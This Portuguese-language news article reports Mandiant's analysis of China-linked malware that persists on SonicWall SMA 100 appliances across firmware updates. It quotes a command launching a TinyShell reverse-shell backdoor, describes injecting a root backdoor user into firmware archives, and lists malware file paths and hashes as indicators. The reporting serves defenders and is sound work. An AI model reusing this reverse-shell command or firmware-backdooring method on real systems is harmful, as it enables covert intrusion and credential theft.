.
Atores de ameaças com conexão com o governo chinês estão infectando um dispositivo de segurança amplamente usado da SonicWall com malware que permanece ativo mesmo depois que o dispositivo recebe atualizações de firmware, disseram os pesquisadores.
O Secure Mobile Access 100 da SonicWall é um dispositivo de acesso remoto seguro que ajuda as organizações a implantar forças de trabalho remotas com segurança. Os clientes o utilizam para conceder controles de acesso granular a usuários remotos, fornecer conexões VPN às redes da organização e definir perfis exclusivos para cada funcionário. O acesso que o SMA 100 tem às redes dos clientes o torna um alvo atraente para os agentes de ameaças.
Em 2021, o dispositivo foi atacado por hackers sofisticados que exploraram o que era então uma vulnerabilidade de dia zero. Dispositivos de segurança da Fortinet e Pulse Secure sofreram ataques semelhantes nos últimos anos.
Ganhando persistência de longo prazo dentro das redes
Na quinta-feira, a empresa de segurança Mandiant publicou um relatório que dizia que os agentes de ameaças com suspeita de conexão com a China estavam engajados em uma campanha para manter a persistência de longo prazo executando malware em dispositivos SonicWall SMA não corrigidos. A campanha se destacou pela capacidade do malware permanecer nos dispositivos mesmo depois que seu firmware recebeu um novo firmware.
“Os invasores colocam um esforço significativo na estabilidade e persistência de suas ferramentas”, escreveram os pesquisadores da Mandiant, Daniel Lee, Stephen Eckels e Ben Read. “Isso permite que o acesso à rede persista por meio de atualizações de firmware e mantenha uma posição na rede por meio do dispositivo SonicWall.”
Para alcançar essa persistência, o malware verifica as atualizações de firmware disponíveis a cada 10 segundos. Quando uma atualização fica disponível, o malware copia o arquivo arquivado para backup, descompacta-o, monta-o e copia todo o pacote de arquivos maliciosos para ele. O malware também adiciona um usuário root backdoor ao arquivo montado. Em seguida, o malware compacta novamente o arquivo para que esteja pronto para instalação.
“A técnica não é especialmente sofisticada, mas mostra um esforço considerável por parte do invasor para entender o ciclo de atualização do dispositivo e, em seguida, desenvolver e testar um método de persistência”, escreveram os pesquisadores.
As técnicas de persistência são consistentes com uma campanha de ataque em 2021 que usou 16 famílias de malware para infectar dispositivos Pulse Secure. A Mandiant atribuiu os ataques a vários grupos de ameaças, incluindo aqueles rastreados como UNC2630, UNC2717, que a empresa disse apoiar “principais prioridades do governo chinês”. A Mandiant atribuiu os ataques em andamento contra os clientes do SonicWall SMA 100 a um grupo rastreado como UNC4540.
“Nos últimos anos, os invasores chineses implantaram várias explorações de dia zero e malware para uma variedade de dispositivos de rede voltados para a Internet como uma rota para a invasão total da empresa, e a instância relatada aqui faz parte de um padrão recente que a Mandiant espera continuar no curto prazo”, escreveram os pesquisadores da Mandiant no relatório de quinta-feira.
Acesso altamente privilegiado
O principal objetivo do malware parece ser o roubo de senhas criptografadas com hash para todos os usuários conectados. Ele também fornece um shell da web que o agente da ameaça pode usar para instalar novos malwares.
“A análise de um dispositivo comprometido revelou uma coleção de arquivos que dão ao invasor um acesso altamente privilegiado e disponível ao dispositivo”, escreveram os pesquisadores no relatório de quinta-feira. “O malware consiste em uma série de scripts bash e um único binário ELF identificado como uma variante do TinyShell. O comportamento geral do conjunto de scripts bash maliciosos mostra uma compreensão detalhada do dispositivo e é bem adaptado ao sistema para fornecer estabilidade e persistência.”
A lista de malware é:
| Caminho | Cerquilha | Função |
| /bin/firewalld | e4117b17e3d14fe64f45750be71dbaa6 | Processo principal de malware |
| /bin/httpsd | 2d57bcb8351cf2b57c4fd2d1bb8f862e | Porta dos fundos do TinyShell |
| /etc/rc.d/rc.local | 559b9ae2a578e1258e80c45a5794c071 | Persistência de inicialização para firewalld |
| /bin/iptabled | 8dbf1effa7bc94fc0b9b4ce83dfce2e6 | Processo de malware principal redundante |
| /bin/geoBotnetd | 619769d3d40a3c28ec83832ca521f521 | Script de backdoor de firmware |
| /bin/ifconfig6 | fa1bf2e427b2defffd573854c35d4919 | Script de desligamento gracioso |
O relatório continuou:
O principal ponto de entrada do malware é um script bash chamado
firewalldque executa seu loop primário uma vez para uma contagem de cada arquivo no sistema ao quadrado: …for j in $(ls / -R) do for i in $(ls / -R) do:… O script é responsável por executar um comando SQL para realizar o roubo de credenciais e a execução dos outros componentes.A primeira função em
firewalldexecuta o backdoor do TinyShellhttpsdcom comandonohup /bin/httpsd -c -d 5 -m -1 -p 51432 > /dev/null 2>&1 &se ohttpsdprocesso ainda não está em execução. Isso define o TinyShell no modo de shell reverso, instruindo-o a chamar o endereço IP e a porta mencionados anteriormente em um horário e dia específicos representados pelo-mbandeira, com um intervalo de baliza definido pelo-dbandeira. O binário incorpora um endereço IP codificado permanentemente, que é usado no modo shell reverso se o argumento do endereço IP for deixado em branco. Ele também tem um modo de shell de ligação de escuta disponível.
Os pesquisadores disseram que não sabiam qual era o vetor de infecção inicial.
Na semana passada, a SonicWall publicou um comunicado que instava os usuários do SMA 100 a atualizar para a versão 10.2.1.7 ou superior. Essas versões incluem aprimoramentos como Monitoramento de Integridade de Arquivos e identificação anômala de processos. O patch está disponível aqui. Os usuários também devem revisar regularmente os logs em busca de sinais de comprometimento, incluindo logins anormais ou tráfego interno.
.
